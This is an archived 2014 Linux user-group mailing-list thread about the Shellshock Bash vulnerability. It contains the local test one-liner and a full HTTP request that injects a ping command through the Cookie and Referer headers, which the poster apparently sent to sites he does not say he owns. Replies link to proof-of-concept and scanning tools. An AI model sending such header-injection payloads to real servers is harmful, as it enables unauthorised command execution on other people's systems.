From eli at billauer.co.il Sun Sep 7 18:35:33 2014 From: eli at billauer.co.il (Eli Billauer) Date: Sun, 07 Sep 2014 18:35:33 +0300 Subject: [Haifux] Haifux: Call for speakers Message-ID: <540C7B45.2040605@billauer.co.il> Hi all, After a short August vacation, Haifux is back. And it seems like it's some kind of tradition that the lecture list is empty at this time of the year. So, any takers? The next slot -- a week from now -- is vacant. Grab it while it's hot! Remember that you don't have to be an expert in the field of your lecture, even though many are. Haifux is also a good place to test-run talks intended for less responsive audiences. See you, Eli -- Web: http://www.billauer.co.il From eli at billauer.co.il Fri Sep 26 12:30:36 2014 From: eli at billauer.co.il (Eli Billauer) Date: Fri, 26 Sep 2014 12:30:36 +0300 Subject: [Haifux] The Bash vulnerability (shellshock) Message-ID: <5425323C.9020304@billauer.co.il> Hi everyone, Happy new year! To make it even merrier, it seems like a rather widespread vulnerability, based upon a bug in Bash (!) has been discovered: http://www.engadget.com/2014/09/25/what-is-the-shellshock/ Or for short, type this on your bash console and see if you're cooked: env x='() { :;}; echo vulnerable' bash -c 'echo This is a test' If it says "vulnerable" before "This is a test", welcome to the club. Odds are it will. So the idea is that you can execute an arbitrary command on a remote computer, if you can add an environment variable, and kick off a bash shell with it. Word has it, that since the HTTP headers are passed to any CGI script as environment variables (by Apache, for example), it's possible to use the Referer or Cookie headers for this purpose. So I tried this on a couple of sites (addresses mangled): GET / HTTP/1.1 Host: thesite.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: () { :; }; ping -c 3 93.1.9.2 Referer: () { :; }; ping -c 3 93.1.9.2 and then went nc thesite.com 80 < therequest.txt This was supposed to trigger a ping in my direction, but it didn't. Instead, I found the full Referer string in the access log. Apparently, it didn't work on my first go. Insights, anyone? Does it mean that the tested site is safe, despite the horror stories? Regards, Eli -- Web: http://www.billauer.co.il From guy.choo.keren at gmail.com Fri Sep 26 12:39:39 2014 From: guy.choo.keren at gmail.com (guy keren) Date: Fri, 26 Sep 2014 12:39:39 +0300 Subject: [Haifux] The Bash vulnerability (shellshock) In-Reply-To: <5425323C.9020304@billauer.co.il> References: <5425323C.9020304@billauer.co.il> Message-ID: <5425345B.1090204@gmail.com> On 09/26/2014 12:30 PM, Eli Billauer wrote: > env x='() { :;}; echo vulnerable' bash -c 'echo This is a test' you're too late - there's a (partial?) fix being distributed around... --guy From shacharr at gmail.com Fri Sep 26 14:25:30 2014 From: shacharr at gmail.com (Shachar Raindel) Date: Fri, 26 Sep 2014 14:25:30 +0300 Subject: [Haifux] The Bash vulnerability (shellshock) In-Reply-To: <5425345B.1090204@gmail.com> References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> Message-ID: On Sep 26, 2014 12:49 PM, "guy keren" wrote: > > On 09/26/2014 12:30 PM, Eli Billauer wrote: >> >> env x='() { :;}; echo vulnerable' bash -c 'echo This is a test' > > > you're too late - there's a (partial?) fix being distributed around... > For your moment of optimism: http://istheinternetonfire.com We haven't had this much fun since the sendmail days... --Shachar -------------- next part -------------- An HTML attachment was scrubbed... URL: From eli at billauer.co.il Fri Sep 26 14:33:31 2014 From: eli at billauer.co.il (Eli Billauer) Date: Fri, 26 Sep 2014 14:33:31 +0300 Subject: [Haifux] The Bash vulnerability (shellshock) In-Reply-To: <5425345B.1090204@gmail.com> References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> Message-ID: <54254F0B.5090209@billauer.co.il> Hi, I did # yum upgrade bash on Haifux' server, and it's off the hook. But I was also surprised that it the attack failed even before that. Eli On 26/09/14 12:39, guy keren wrote: > On 09/26/2014 12:30 PM, Eli Billauer wrote: >> env x='() { :;}; echo vulnerable' bash -c 'echo This is a test' > > you're too late - there's a (partial?) fix being distributed around... > > --guy > _______________________________________________ > Haifux mailing list > Haifux at haifux.org > http://haifux.org/mailman/listinfo/haifux > -- Web: http://www.billauer.co.il From boaz.gezer at gmail.com Sat Sep 27 11:36:14 2014 From: boaz.gezer at gmail.com (boazg) Date: Sat, 27 Sep 2014 11:36:14 +0300 Subject: [Haifux] The Bash vulnerability (shellshock) In-Reply-To: <54254F0B.5090209@billauer.co.il> References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> <54254F0B.5090209@billauer.co.il> Message-ID: you need to find a vulnerable site. CGI doesn't have to pass through bash. you need a site that opens a subshell for something. they aren't uncommon, but it's not every linux-CGI site. On Fri, Sep 26, 2014 at 2:33 PM, Eli Billauer wrote: > Hi, > > I did > > # yum upgrade bash > > on Haifux' server, and it's off the hook. But I was also surprised that it > the attack failed even before that. > > Eli > > > On 26/09/14 12:39, guy keren wrote: > >> On 09/26/2014 12:30 PM, Eli Billauer wrote: >> >>> env x='() { :;}; echo vulnerable' bash -c 'echo This is a test' >>> >> >> you're too late - there's a (partial?) fix being distributed around... >> >> --guy >> _______________________________________________ >> Haifux mailing list >> Haifux at haifux.org >> http://haifux.org/mailman/listinfo/haifux >> >> > > -- > Web: http://www.billauer.co.il > > > _______________________________________________ > Haifux mailing list > Haifux at haifux.org > http://haifux.org/mailman/listinfo/haifux > -------------- next part -------------- An HTML attachment was scrubbed... URL: From boaz.gezer at gmail.com Sat Sep 27 11:37:45 2014 From: boaz.gezer at gmail.com (boazg) Date: Sat, 27 Sep 2014 11:37:45 +0300 Subject: [Haifux] The Bash vulnerability (shellshock) In-Reply-To: References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> <54254F0B.5090209@billauer.co.il> Message-ID: try it with DHCP instead https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/ On Sat, Sep 27, 2014 at 11:36 AM, boazg wrote: > you need to find a vulnerable site. CGI doesn't have to pass through bash. > you need a site that opens a subshell for something. they aren't uncommon, > but it's not every linux-CGI site. > > On Fri, Sep 26, 2014 at 2:33 PM, Eli Billauer wrote: > >> Hi, >> >> I did >> >> # yum upgrade bash >> >> on Haifux' server, and it's off the hook. But I was also surprised that >> it the attack failed even before that. >> >> Eli >> >> >> On 26/09/14 12:39, guy keren wrote: >> >>> On 09/26/2014 12:30 PM, Eli Billauer wrote: >>> >>>> env x='() { :;}; echo vulnerable' bash -c 'echo This is a test' >>>> >>> >>> you're too late - there's a (partial?) fix being distributed around... >>> >>> --guy >>> _______________________________________________ >>> Haifux mailing list >>> Haifux at haifux.org >>> http://haifux.org/mailman/listinfo/haifux >>> >>> >> >> -- >> Web: http://www.billauer.co.il >> >> >> _______________________________________________ >> Haifux mailing list >> Haifux at haifux.org >> http://haifux.org/mailman/listinfo/haifux >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From guy at pclabs.co.il Sat Sep 27 22:42:58 2014 From: guy at pclabs.co.il (Guy Edri) Date: Sat, 27 Sep 2014 22:42:58 +0300 Subject: [Haifux] The Bash vulnerability (shellshock) In-Reply-To: References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> <54254F0B.5090209@billauer.co.il> Message-ID: Hey Eli. http://www.tripwire.com/state-of-security/off-topic/shell-shocked-bash-bug-detection-tools-cve-2014-6271/ http://shellshocktest.com/ https://github.com/mubix/shellshocker-pocs enjoy your PT with all those tools. On Sat, Sep 27, 2014 at 11:37 AM, boazg wrote: > try it with DHCP instead > > https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/ > > On Sat, Sep 27, 2014 at 11:36 AM, boazg wrote: > >> you need to find a vulnerable site. CGI doesn't have to pass through >> bash. you need a site that opens a subshell for something. they aren't >> uncommon, but it's not every linux-CGI site. >> >> On Fri, Sep 26, 2014 at 2:33 PM, Eli Billauer wrote: >> >>> Hi, >>> >>> I did >>> >>> # yum upgrade bash >>> >>> on Haifux' server, and it's off the hook. But I was also surprised that >>> it the attack failed even before that. >>> >>> Eli >>> >>> >>> On 26/09/14 12:39, guy keren wrote: >>> >>>> On 09/26/2014 12:30 PM, Eli Billauer wrote: >>>> >>>>> env x='() { :;}; echo vulnerable' bash -c 'echo This is a test' >>>>> >>>> >>>> you're too late - there's a (partial?) fix being distributed around... >>>> >>>> --guy >>>> _______________________________________________ >>>> Haifux mailing list >>>> Haifux at haifux.org >>>> http://haifux.org/mailman/listinfo/haifux >>>> >>>> >>> >>> -- >>> Web: http://www.billauer.co.il >>> >>> >>> _______________________________________________ >>> Haifux mailing list >>> Haifux at haifux.org >>> http://haifux.org/mailman/listinfo/haifux >>> >> >> > > _______________________________________________ > Haifux mailing list > Haifux at haifux.org > http://haifux.org/mailman/listinfo/haifux > > -- ????? ??? ???? ???? : 227799 - 048 ???? : 2121313 - 054 -------------- next part -------------- An HTML attachment was scrubbed... URL: From eli at billauer.co.il Sun Sep 28 18:12:54 2014 From: eli at billauer.co.il (Eli Billauer) Date: Sun, 28 Sep 2014 18:12:54 +0300 Subject: [Haifux] The Bash vulnerability (shellshock) In-Reply-To: References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> <54254F0B.5090209@billauer.co.il> Message-ID: <54282576.8040005@billauer.co.il> Thanks Guy. I'll definitely try one of those test scripts. As for asking a random site to check this for me -- I'm not sure it's a good idea. I mean, I don't know who has set up this site and what their intentions are... Regards, Eli On 27/09/14 22:42, Guy Edri wrote: > Hey Eli. > > http://www.tripwire.com/state-of-security/off-topic/shell-shocked-bash-bug-detection-tools-cve-2014-6271/ > > http://shellshocktest.com/ > > https://github.com/mubix/shellshocker-pocs > > enjoy your PT with all those tools. > > -- Web: http://www.billauer.co.il